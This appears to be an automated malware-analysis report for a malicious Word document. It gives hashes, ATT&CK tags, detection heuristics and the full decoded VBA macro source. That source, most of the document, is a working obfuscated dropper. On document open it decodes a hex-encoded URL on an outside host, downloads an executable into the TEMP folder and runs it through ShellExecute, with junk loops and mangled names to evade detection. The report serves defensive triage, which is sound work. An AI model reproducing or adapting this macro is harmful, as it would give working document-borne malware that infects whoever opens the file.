Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d1efd871e5b653d4…

MALICIOUS

Office (OLE)

39.0 KB Created: 2014-11-24 12:03:00 Authoring application: Microsoft Office Word First seen: 2015-02-05
MD5: 119f0030694bce7af3c2c1ba9fd5622d SHA-1: cd79149958b81dbc9baa705ad8872bf6ca862e67 SHA-256: d1efd871e5b653d4c9f38edd56f05b54700fff082f9b59f75729fb4d9bfe361b
324 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains obfuscated VBA macros, including an AutoOpen macro, which is a common technique for executing malicious code upon opening a document. The script utilizes CreateObject to instantiate an object for web requests and appears to download a second-stage payload from a URL constructed via HexToString. The presence of ShellExecute API calls further indicates execution of external code.

Heuristics 11

  • ClamAV: Doc.Dropper.Agent-1616700 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-1616700
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Set AUjVIjFE = CreateObject(HexToString("4D53584D4C322E584D4C48545450"))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set AUjVIjFE = CreateObject(HexToString("4D53584D4C322E584D4C48545450"))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        NgRVvV.ShellExecute Environ(HexToString("54454D50")) & HexToString("5C3332343233343233342E657865")
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6280 bytes
SHA-256: 49adad1fc33c1631d0fb4ffc3b21f27b15677f0623765b95f200a2a78cef8942
Detection
ClamAV: No threats found
Obfuscation or payload: likely
54 of 106 identifiers look randomly generated (e.g. 'HrZcwZdroQkJJ') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub uiwefds()
Dim oYoglGYg As Integer
For oYoglGYg = 0 To 7
Dim PwYchYpl As Integer
For PwYchYpl = 0 To 3
DoEvents
Next PwYchYpl
DoEvents
Next oYoglGYg
Dim NDClCYxB As Integer
For NDClCYxB = 0 To 5
DoEvents
Next NDClCYxB
GHJksdfsd
End Sub
Sub AutoOpen()
Dim BUJpNGVs As Integer
For BUJpNGVs = 0 To 2
Dim ojePHgOn As Integer
For ojePHgOn = 0 To 4
DoEvents
Next ojePHgOn
DoEvents
Next BUJpNGVs
Dim arGnmRUr As Integer
For arGnmRUr = 0 To 2
DoEvents
Next arGnmRUr
    uiwefds
End Sub
Sub Workbook_Open()
Dim tIQONlRl As Integer
For tIQONlRl = 0 To 9
Dim DlcKhaLG As Integer
For DlcKhaLG = 0 To 6
DoEvents
Next DlcKhaLG
DoEvents
Next tIQONlRl
Dim Dqjehtla As Integer
For Dqjehtla = 0 To 3
DoEvents
Next Dqjehtla
    uiwefds
End Sub
Function SaveWebFile(ByVal vWebFile As String, ByVal fgHBjsdfsdf As String) As Boolean
    Dim AUjVIjFE As Object, i As Long, vFF As Long, oResp() As Byte
Dim MKwDfrWa As Integer
For MKwDfrWa = 0 To 7
Dim AnEJnNux As Integer
For AnEJnNux = 0 To 4
DoEvents
Next AnEJnNux
DoEvents
Next MKwDfrWa
Dim VXgWAtjh As Integer
For VXgWAtjh = 0 To 8
DoEvents
Next VXgWAtjh
     

Dim nWmhpOLJ As Integer
For nWmhpOLJ = 0 To 3
Dim TOBHJjkq As Integer
For TOBHJjkq = 0 To 4
DoEvents
Next TOBHJjkq
DoEvents
Next nWmhpOLJ
Dim xfCKaGSU As Integer
For xfCKaGSU = 0 To 3
DoEvents
Next xfCKaGSU
    Set AUjVIjFE = CreateObject(HexToString("4D53584D4C322E584D4C48545450"))
    AUjVIjFE.Open HexToString("474554"), vWebFile, False
Dim cuEdWJEi As Integer
For cuEdWJEi = 0 To 3
Dim hcMcVDAy As Integer
For hcMcVDAy = 0 To 8
DoEvents
Next hcMcVDAy
DoEvents
Next cuEdWJEi
Dim kNlYlYYP As Integer
For kNlYlYYP = 0 To 2
DoEvents
Next kNlYlYYP
    AUjVIjFE.Send
Dim gLIiHklS As Integer
For gLIiHklS = 0 To 7
Dim UHLxoTnO As Integer
For UHLxoTnO = 0 To 8
DoEvents
Next UHLxoTnO
DoEvents
Next gLIiHklS
Dim lOpUCeCz As Integer
For lOpUCeCz = 0 To 5
DoEvents
Next lOpUCeCz
        
Dim vigWOhDJ As Integer
For vigWOhDJ = 0 To 1
Dim gSEWVnBT As Integer
For gSEWVnBT = 0 To 1
DoEvents
Next gSEWVnBT
DoEvents
Next vigWOhDJ
Dim WHvOpdZY As Integer
For WHvOpdZY = 0 To 7
DoEvents
Next WHvOpdZY
    oResp = AUjVIjFE.responseBody
Dim CqPSLUWL As Integer
For CqPSLUWL = 0 To 2
Dim tzgGgSOk As Integer
For tzgGgSOk = 0 To 3
DoEvents
Next tzgGgSOk
DoEvents
Next CqPSLUWL
Dim DIQRntnq As Integer
For DIQRntnq = 0 To 9
DoEvents
Next DIQRntnq
     
Dim mvaENwsz As Integer
For mvaENwsz = 0 To 9
Dim ZJEzoywE As Integer
For ZJEzoywE = 0 To 4
DoEvents
Next ZJEzoywE
DoEvents
Next mvaENwsz
Dim iaNOZsvg As Integer
For iaNOZsvg = 0 To 9
DoEvents
Next iaNOZsvg
    vFF = FreeFile
    Open fgHBjsdfsdf For Binary Access Write As #vFF
Dim DNRdFOSY As Integer
For DNRdFOSY = 0 To 6
Dim lHduYTlx As Integer
For lHduYTlx = 0 To 2
DoEvents
Next lHduYTlx
DoEvents
Next DNRdFOSY
Dim xaxyXJkE As Integer
For xaxyXJkE = 0 To 3
DoEvents
Next xaxyXJkE
    Put #vFF, , oResp
Dim bbpmZDkm As Integer
For bbpmZDkm = 0 To 7
Dim xPdrKQOZ As Integer
For xPdrKQOZ = 0 To 6
DoEvents
Next xPdrKQOZ
DoEvents
Next bbpmZDkm
Dim ASdHxvKS As Integer
For ASdHxvKS = 0 To 7
DoEvents
Next ASdHxvKS
    Close #vFF

Dim uhhgqFpN As Integer
For uhhgqFpN = 0 To 3
Dim FbRVvahd As Integer
For FbRVvahd = 0 To 9
DoEvents
Next FbRVvahd
DoEvents
Next uhhgqFpN
Dim kbcDCzXs As Integer
For kbcDCzXs = 0 To 5
DoEvents
Next kbcDCzXs
    Set AUjVIjFE = Nothing
    Dim NgRVvV As Object
Dim oLSYueam As Integer
For oLSYueam = 0 To 4
Dim wEjGWMqW As Integer
For wEjGWMqW = 0 To 8
DoEvents
Next wEjGWMqW
DoEvents
Next oLSYueam
Dim uHhPIfye As Integer
For uHhPIfye = 0 To 6
DoEvents
Next uHhPIfye
    Set NgRVvV = CreateObject(HexToString("5368656C6C2E6170706C69636174696F6E"))
Dim oSEXVckr As Integer
For oSEXVckr = 0 To 9
Dim TuqwgeFr As Integer
For TuqwgeFr = 0 To 2
DoEvents
Next TuqwgeFr
DoEvents
Next oSEXVckr
Dim bSTYjBaq As Integer
For bSTYjBaq = 0 To 3
DoEvents
Next bSTYjBaq
    NgRVvV.ShellExecute Environ(HexToString("54454D50")) & HexToString("5C3332343233343233342E657865")
    End Function
Sub GHJksdfsd()

Dim TTlulrHb As Integer
For TTlulrHb = 0 To 4
Dim nzPhlZuA As Integer
For nzPhlZuA = 0 To 3
DoEvents
Next nzPhlZuA
DoEvents
Next TTlulrHb
Dim pKYcyISK As Integer
For pKYcyISK = 0 To 1
DoEvents
Next pKYcyISK
    SaveWebFile HexToString("687474703A2F2F746563686E6F2D6B61722E72752F6A732F62696E2E657865"), Environ(HexToString("54454D50")) & HexToString("5C3332343233343233342E657865")

End Sub



Public Function HexToString(ByVal strData As String) As String
    Dim HrZcwZdroQkJJ As String
Dim jmyReLXI As Integer
For jmyReLXI = 0 To 2
Dim UcaPijwK As Integer
For UcaPijwK = 0 To 5
DoEvents
Next UcaPijwK
DoEvents
Next jmyReLXI
Dim pllpewTD As Integer
For pllpewTD = 0 To 1
DoEvents
Next pllpewTD
    Do Until Len(strData) < 2
Dim TAGfGllS As Integer
For TAGfGllS = 0 To 8
Dim OKpypckB As Integer
For OKpypckB = 0 To 2
DoEvents
Next OKpypckB
DoEvents
Next TAGfGllS
Dim lVsQygKc As Integer
For lVsQygKc = 0 To 8
DoEvents
Next lVsQygKc
        HrZcwZdroQkJJ = HrZcwZdroQkJJ + Chr$(CLng("&H" + Left$(strData, 2)))
Dim DjKVyyaC As Integer
For DjKVyyaC = 0 To 6
Dim Drofnybo As Integer
For Drofnybo = 0 To 3
DoEvents
Next Drofnybo
DoEvents
Next DjKVyyaC
Dim ShVjCMDA As Integer
For ShVjCMDA = 0 To 3
DoEvents
Next ShVjCMDA
        strData = Right$(strData, Len(strData) - 2)
Dim ISBftRjL As Integer
For ISBftRjL = 0 To 8
Dim cluMyKYJ As Integer
For cluMyKYJ = 0 To 3
DoEvents
Next cluMyKYJ
DoEvents
Next ISBftRjL
Dim fUrZEoEs As Integer
For fUrZEoEs = 0 To 5
DoEvents
Next fUrZEoEs
    Loop
Dim zylYcfyu As Integer
For zylYcfyu = 0 To 8
Dim JkXjjQxz As Integer
For JkXjjQxz = 0 To 6
DoEvents
Next JkXjjQxz
DoEvents
Next zylYcfyu
Dim vIqIGDXI As Integer
For vIqIGDXI = 0 To 3
DoEvents
Next vIqIGDXI
    HexToString = HrZcwZdroQkJJ
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.